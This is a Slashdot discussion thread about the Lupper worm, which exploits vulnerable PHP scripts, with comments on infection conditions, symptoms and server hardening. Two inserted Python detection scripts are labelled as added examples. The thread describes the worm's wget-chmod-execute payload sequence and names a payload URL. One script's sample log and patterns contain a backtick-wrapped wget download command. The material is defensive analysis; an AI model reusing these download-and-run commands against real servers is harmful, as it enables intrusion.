Linux Lupper.Worm In the Wild
jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm, which also exists for BSD, just to be cross-platform. From the McAfee description: The worm blindly attacks web servers by sending malicious HTTP requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
CONTINUE: (Score:5, Funny)
p.s. BURN KARMA BURN!
Re:CONTINUE: (Score:2, Funny)
And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.
Re:CONTINUE: (Score:3, Funny)
Re:CONTINUE: (Score:4, Insightful)
Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
Re:CONTINUE: (Score:3, Interesting)
Only partially. (Score:4, Insightful)
If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.
If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.
If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.
So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.
Both can be made vulnerable by installing systems/scripts that are not part of the default system.
But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.
The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.
Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
Can't measure OS security by worm prevalence. (Score:3, Insightful)
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major
Re:Only partially. (Score:3, Insightful)
If you're the only user, you can rename the xmlrpc files.
Besides, your
Re:CONTINUE: (Score:3, Insightful)
FTA I don't see where it's a Linux worm, or even an Apache worm; it's primarily attacking PHP scripts, and even then it's only capable of attacking PHP scripts on servers that are configured to allow 2 very well known security configuration flaws and one that's recommended against. NOTE the Windows ME-XP instructions on the page [nai.com].
Re:CONTINUE: (Score:3, Informative)
Re:CONTINUE: (Score:3, Interesting)
I find it kind of strange however that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even services directory exists in my htdoc
Remarkably Useless page. (Score:5, Interesting)
Second, how do you remove it? Quoth the page:
Re:Remarkably Useless page. (Score:4, Informative)
I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.
Re:Remarkably Useless page. (Score:5, Insightful)
More alarmist shit (and old news at that - The Reg reported this last week).
Some PHP scripts that have as much to do with Linux as a vulnerability in, say, Photoshop has to do with XP.
The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).
Re:Remarkably Useless page. (Score:5, Informative)
My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.
This indicates that this is indeed in the wild, and active, and spreading.
Thus, it is not alarmist shit.
Re:Remarkably Useless page. (Score:5, Insightful)
The key word is "attempts".
Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?
The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.
Now:
In other words, nothing to see here but more antivirus vendor fud.
Re:Remarkably Useless page. (Score:3, Insightful)
er, where exactly do you think these "attempts" are coming from? It's been classified as a worm for a reason.
it was mis-classified as a "linux" worm, even though it has zero to do with linux. It's a bug in several php 3rd-party scripts, it was fixed months ago, and today is Troll Tuesday, and the editors are messing with your heads.
sure, if I want I could set a box up to partake in the fun (get an older distro, make sure it has the right files, and put it on the net ... and wait pretty much forever f
Re:Remarkably Useless page. (Score:5, Funny)
I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/ [127.0.0.1]
Knock yourselves out :-)
Re:Remarkably Useless page. (Score:5, Funny)
Re:Remarkably Useless page. (Score:3, Insightful)
So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.
on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scripts with holes in them
Re:Remarkably Useless page. (Score:2)
I wouldn't call the gp poster a troll. I'd say it's more like the antivirus company trolling us. The only reason the risk is rated "low" is because their rating scale doesn't go below that.
Re:Remarkably Useless page. (Score:5, Informative)
Other links (Score:4, Informative)
It's not Windows (Score:5, Informative)
Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in
Re:Remarkably Useless page. (Score:5, Insightful)
Symptoms
Presence of the following file:
*
One of the following ports are listening:
* UDP 7111
* UDP 7222
so running su -c"netstat --listening --extend --program" tells you if it's even running, by listing what is listening on any port such as UDP 7111 or 7222
then it would be easy to
su -c"kill -9 pid-of-lupii" su -c"rm
the worm apparently does this
echo '_begin_';echo `cd
so unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories.
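The netstat check above, done from the kernel's own socket table, as an added example (not code from the thread or from McAfee): it parses /proc/net/udp, whose local endpoint column is hex ADDR:PORT, and reports whether either of the UDP ports listed under "Symptoms" (7111 and 7222) is bound, together with the owning uid, so you can see at a glance whether the listener belongs to the web server's unprivileged account. The /proc/net/udp excerpt used as sample input is constructed.

```python
"""Look for the Lupper UDP listeners (7111, 7222) in a /proc/net/udp dump."""
from typing import Dict

# Ports named under "Symptoms" in the thread.
LUPPER_UDP_PORTS = {7111, 7222}

# Constructed /proc/net/udp excerpt in the real kernel column layout:
# a benign DNS socket on 127.0.0.1:53 (owned by root, uid 0) and a socket
# bound on all interfaces to UDP 7111 (0x1BC7), owned by uid 65534 (nobody).
SAMPLE_PROC_NET_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
 123: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 12345 2 0000000000000000 0
 456: 00000000:1BC7 00000000:0000 07 00000000:00000000 00:00000000 00000000 65534        0 67890 2 0000000000000000 0
"""


def bound_udp_ports(proc_net_udp: str) -> Dict[int, int]:
    """Map every local UDP port in the dump to the uid that owns the socket.

    Row layout after splitting on whitespace: 0 sl, 1 local ADDR:PORT (hex),
    2 remote, 3 state, 4 tx:rx queues, 5 tr:when, 6 retrnsmt, 7 uid, ...
    The first line is the column header and is skipped.
    """
    ports: Dict[int, int] = {}
    for line in proc_net_udp.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 8 or ":" not in fields[1]:
            continue  # blank or malformed row
        _addr, port_hex = fields[1].rsplit(":", 1)
        ports[int(port_hex, 16)] = int(fields[7])
    return ports


def lupper_ports_bound(proc_net_udp: str) -> Dict[int, int]:
    """Subset of bound_udp_ports() restricted to the worm's known ports."""
    return {p: uid for p, uid in bound_udp_ports(proc_net_udp).items()
            if p in LUPPER_UDP_PORTS}


def check_live_system(path: str = "/proc/net/udp") -> Dict[int, int]:
    """Run the same check against the running kernel's table."""
    with open(path) as fh:
        return lupper_ports_bound(fh.read())


if __name__ == "__main__":
    hits = lupper_ports_bound(SAMPLE_PROC_NET_UDP)
    print("sample table:", hits or "no suspicious UDP listeners")
    try:
        print("this host:", check_live_system() or "no suspicious UDP listeners")
    except OSError as exc:  # not Linux, or /proc not mounted
        print("live check skipped:", exc)
```

A hit only tells you something is bound to the port; confirm with `netstat --program` (as the post above does) or `ss -ulnp` before killing anything, since any daemon could legitimately use those numbers.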
PHP exploit, not directly a linux problem? (Score:5, Insightful)
Re:PHP exploit, not directly a linux problem? (Score:5, Informative)
Re:PHP exploit, not directly a linux problem? (Score:4, Informative)
According to this article [com.com], AWStats was patched back in February.
AWStats is a PHP application? (Score:5, Informative)
Re:PHP exploit, not directly a linux problem? (Score:3, Interesting)
Re:PHP exploit, not directly a linux problem? (Score:3, Insightful)
The security holes are most likely generic.
How can we get some free press? (Score:3, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Re:How can we get some free press? (Score:5, Insightful)
Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
well, no (Score:2)
Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that deskt
IE is not cross-platform (Score:3, Interesting)
Re:How can we get some free press? (Score:2)
Re:How can we get some free press? (Score:2, Insightful)
Re:How can we get some free press? (Score:2, Interesting)
It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...
if it attacks PHP cross-platform... (Score:5, Insightful)
Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
Re:if it attacks PHP cross-platform... (Score:4, Informative)
Not exactly. From what I understood, there are BSD and Linux variants: both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.
There's a layer available in BSD that allows running Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect Linux through Wine.
Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii?
Sadly a preview of things to come because... (Score:5, Insightful)
Success is a double-edged sword.
Popularity != Security (Score:3, Insightful)
This has nothing to do with whether "valuable and important data" is stored on a Linux box.
If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.
Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
You're wrong. (Score:5, Insightful)
There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.
The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home. That's what you believe. Yet my bank example shows that popularity has nothing to do with security. That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
No. (Score:3, Insightful)
No. You don't understand security.
Security is independent of popularity.
There is nothing about popularity that makes a system more or less secure.
No.
No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.
Re:Sadly a preview of things to come because... (Score:3, Insightful)
if, for example, you type this into my browser
and I see bingo in my browser, example.com would probably be vulnerable. The worm presently uses a Linux program, wget (wget is a program that downloads files from a web server), to download the payload to the vulnerable machine, make it executable with a chmod +x and run it. When the worm
Complete infection (Score:5, Funny)
Conditions for infection... (Score:5, Insightful)
Re:Conditions for infection... (Score:5, Funny)
SCNR
Re:Conditions for infection... (Score:5, Informative)
Re:Conditions for infection... (Score:3, Informative)
Re:Conditions for infection... (Score:3, Informative)
Re:Conditions for infection... (Score:3, Informative)
Per Making /tmp non-executable [debian-adm...ration.org]:
What you need is defense in depth. Mounting /tmp noexec,nosuid helps; keeping everything up-to-date helps; scanning your log files, following the news,... You get the idea.
And of course, hiring someone competent to do all this is a fine idea;)
Re:Conditions for infection... (Score:3, Informative)
Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.
Re:Conditions for infection... (Score:2)
Basically, it's whether you allow the following:
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.
--Robert
Re:Conditions for infection... (Score:3, Informative)
It's not configuration of Apache, but configuration of PHP. Basically, it's whether you allow the following:
<?php
$foo = `ls`;                                      // #1: shell command execution via backticks
$bar = include("http://foo.com/example.txt");     // #2: including a file fetched over HTTP (remote file protocols)
?>
A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).
#2 is just plain dumb.
I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least)
Re:Conditions for infection... (Score:3, Insightful)
for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking l
Before all teh MSFT fanboys jump on this, (Score:5, Funny)
IF you run a specific kernel version with some special module
AND you run one of a couple specific versions of one package not installed by default
AND you have a very "generic" config on that package
AND you have some plugins enabled, but not configured for security
AND you are on a world routable IP address
AND you have some specific vulnerable scripts,
THEN you might need to take a look at if you are at risk.
Paraphrased from the virus description of most MSFT worms:
IF you run an MSFT operating system
AND you haven't reformatted your HDD in the last hour
THEN it's time to pucker up and kiss the sucker goodbye..
-GenTimJS
Re:Before all teh MSFT fanboys jump on this, (Score:3, Interesting)
"Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."
And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really
Re:Before all teh MSFT fanboys jump on this, (Score:2, Insightful)
Re:Before all teh MSFT fanboys jump on this, (Score:2)
Um, yeah, and AFAIK, part of that includes not having the webserver on by default. You turn it on, you're at risk.
Re:Before all teh MSFT fanboys jump on this, (Score:2)
Or it could just be that BSD users, like Linux users, aren't all security conscious in all decisions about what they install.
Too many ifs (Score:5, Interesting)
which in practice means that your admin died a couple of years ago but was never replaced.
Short of detail (Score:5, Informative)
"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.
AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.
Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "
This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes - more info, anyone?
Re:Short of detail (Score:3, Informative)
Re:Short of detail (Score:2)
Of course, MediaWiki is the pet target of some zombie-based spamming attacks right now, but that's not MW's fault, and I can clean up after that ok for now. If it gets worse, I'll have to start using some kind of visual authentication scheme.
Re:Short of detail (Score:2)
Does it look like this? (Score:5, Informative)
193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET
...
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST
...
For 60 hits.
Re:Does it look like this? (Score:2)
I think there is also a "scout" part, which finds vulnerable hosts, as I also have requests like this:
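A way to pick the probe pattern shown in the two posts above (a burst of GETs to the vulnerable script names, then POSTs from the same source) out of an Apache access log, as an added example that is not code from the thread or from McAfee. It flags requests to the script names the thread mentions (xmlrpc.php, and the AWStats CGI, whose file name awstats.pl is assumed from the AWStats project since the thread only says "AWStats") and requests whose decoded URL carries download-and-run tokens (wget, chmod) or shell metacharacters, then summarises per source IP whether the GET-then-POST sequence occurred. The log lines are constructed sample input; real traffic will use different paths and payloads.

```python
"""Flag Lupper-style probes in Apache combined-format access log lines."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# ip, method, url, status from a combined/common log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# Script names from the thread; awstats.pl is an assumption (see lead-in).
TARGET_SCRIPTS = {"xmlrpc.php", "awstats.pl"}
# Tokens that suggest a download-and-execute attempt in the request URL.
SHELL_MARKERS = ("wget", "chmod", "`", "|", ";")

# Constructed sample log: one scanning host and one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.9 - - [04/Nov/2005:15:10:10 -0700] "GET /xmlrpc.php HTTP/1.1" 404 291 "-" "lwp-trivial/1.41"
203.0.113.9 - - [04/Nov/2005:15:10:12 -0700] "GET /cgi-bin/awstats.pl?x=%60wget%20http://198.51.100.200/a.txt%60 HTTP/1.1" 404 291 "-" "lwp-trivial/1.41"
203.0.113.9 - - [04/Nov/2005:15:10:31 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 200 513 "-" "lwp-trivial/1.41"
198.51.100.7 - - [04/Nov/2005:16:02:01 -0700] "GET /index.html HTTP/1.1" 200 2043 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Nov/2005:16:02:03 -0700] "GET /wiki/index.php?title=Main_Page HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

Hit = Tuple[str, str, str, List[str]]  # ip, method, url, reasons


def parse_line(line: str) -> Optional[dict]:
    """Extract the fields we need; None for lines that are not requests."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, url, status = m.groups()
    return {"ip": ip, "method": method, "url": url, "status": int(status)}


def reasons_for(req: dict) -> List[str]:
    """Why a request is suspicious; empty list when it is not."""
    reasons = []
    decoded = unquote_plus(req["url"])  # %60 -> backtick, %20 -> space, ...
    script = urlsplit(decoded).path.rsplit("/", 1)[-1]
    if script in TARGET_SCRIPTS:
        reasons.append(f"request to {script}")
    found = [tok for tok in SHELL_MARKERS if tok in decoded]
    if found:
        reasons.append("shell/download tokens: " + ", ".join(found))
    return reasons


def scan_log(lines) -> List[Hit]:
    """All suspicious requests, in log order."""
    hits: List[Hit] = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        reasons = reasons_for(req)
        if reasons:
            hits.append((req["ip"], req["method"], req["url"], reasons))
    return hits


def summarize_by_ip(hits: List[Hit]) -> Dict[str, dict]:
    """Per-source counts, plus whether the GET-probe-then-POST sequence appeared."""
    summary: Dict[str, dict] = defaultdict(lambda: {"count": 0, "methods": set()})
    for ip, method, _url, _reasons in hits:
        summary[ip]["count"] += 1
        summary[ip]["methods"].add(method)
    for info in summary.values():
        info["probe_then_post"] = {"GET", "POST"} <= info["methods"]
    return dict(summary)


if __name__ == "__main__":
    found_hits = scan_log(SAMPLE_LOG.splitlines())
    for ip, method, url, reasons in found_hits:
        print(f"{ip} {method} {url}: {'; '.join(reasons)}")
    print(summarize_by_ip(found_hits))
```

Run it over a real log with `scan_log(open("/var/log/apache2/access.log"))`; a hit means someone probed for the hole, not that it worked, so check the status codes and whether the named scripts exist on your server at all.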
Linux? (Score:2, Interesting)
I'm not worried... (Score:5, Funny)
Re:I'm not worried... (Score:4, Funny)
Yes, if your luck with PHP on linux is like mine, you'll have to resolve dependencies for about 15 minutes first
-WS
Re:I'm not worried... (Score:4, Funny)
Please Rate This Worm Info!! (Score:3, Interesting)
Let McAfee know how well they're trolling.
Did some more research (Score:2)
Linux/BSD only (Score:4, Funny)
It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.
Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!
Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
Re:Linux/BSD only (Score:5, Insightful)
No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.
Re:Linux/BSD only (Score:2)
More info (Score:2)
And according to a 2002 cert advisory [cert.org] the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..
Surprisingly there seems to be no mention of it at apache.org, which leads me to think it's pretty benign and not widespread. I could be wrong.
Gnu! (Score:5, Funny)
no login shell (Score:2)
1. don't permit external shell access through your www accounts. Make all your www accounts' shell be
2. don't permit
Re:no login shell (Score:3, Interesting)
You should be using mod_security.
http://understudy.net/tutorials.php?name=wget [understudy.net] comes back failed. You can run limited-ability shell accounts such as scponlyc (chrooted version of scponly)
And the servers I run on are all FreeBSD based.
Mod security can be found here:
http://modsecurity.org/ [modsecurity.org]
http://www.gotroot.com/tiki-index.php?page=mod_security+rules [gotroot.com]
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html [onlamp.com]
clearly a violation (Score:4, Funny)
Simple but effective hardening measures (Score:2)
Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.
Why Linux is still more secur (Score:2)
Safety of Linux user who screws up >> MS user who does everything right
linux? sounds like apache+php (Score:2)
I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?
sounds to me like a new version of the old formmail.pl problem.
Sad, really (Score:2)
Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.
With that said, my writeup of the worm is here:
http://www.lurhq.com/slapperv2.html [lurhq.com]
Includes some previously unreleas
Um... (Score:2)
So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
an excerpt from my logs (Score:3, Informative)
[06/Nov/2005:18:13:39 -0500] "GET
Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??
Preventative measures (Score:4, Insightful)
The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:
1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.
Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance from everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more aggressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc.), you can make it so the web server needs to have no egress *at all* except via the services on the other Xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.
I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
Lupper? Isn't that a 3:00 pm meal... (Score:3, Interesting)
They are just now discovering this??? (Score:3, Funny)
Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server.
Re:So let me get this straight (Score:2)
Re:So let me get this straight (Score:3, Insightful)
In the distros I've used, the user has to explicitly choose to have a web server installed. Even after that, the user's probably going to have to explicitly choose to install PHP.
Re:So let me get this straight (Score:2)
Perhaps the most interesting thing is that a Mac *could* be vulnerable to this attack. Yet 99.9% of the Macs out there aren't, because the system doesn't ship with the web server running by default. In other words, Linux is making Microsoft's mistakes all over again.
As far as I can tell, a default Linux distro isn't vulnerable until you install a vulnerable PHP or CGI script. I don't think many Linux systems ship in this configuration. The reason why this worm exists is due to the wide deployment of Li
Re:So let me get this straight (Score:2)
I really do wonder if the script can infect an OS X machine running AWStats? Many posters seem to think the answer is 'No'. Sadly, the article is shy on details, but I think the answer may be 'Yes'. Which could make this the first available Mac OS X Virus.
What's really interesting, however, is the fact that the worm i
Re:So let me get this straight (Score:2)
The reason why this worm exists is due to the wide deployment of Linux http servers with this specific vulnerability. There just aren't many Mac OS X web servers out there to bother with them.
What about:
The reason why this worm exists is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Sure, it lacks the first sentence. But the hive-mind here does not like that argument.
Re:So let me get this straight (Score:3, Interesting)
Linux has a smaller Market Share than Mac OS X, yet it's still getting targeted by virus writers?
... just so you don't need to feel left out.
But really, this article is just more anti-virus vendor FUD. Seems they're trolling non-windows users on a weekly basis (Maybe they enjoy Troll Tuesday?) because they know that their time is almost up:
Re:So let me get this straight (Score:2)
No one enables it though, I'm just being a smartass.
Re:Been around earlier? (Score:2)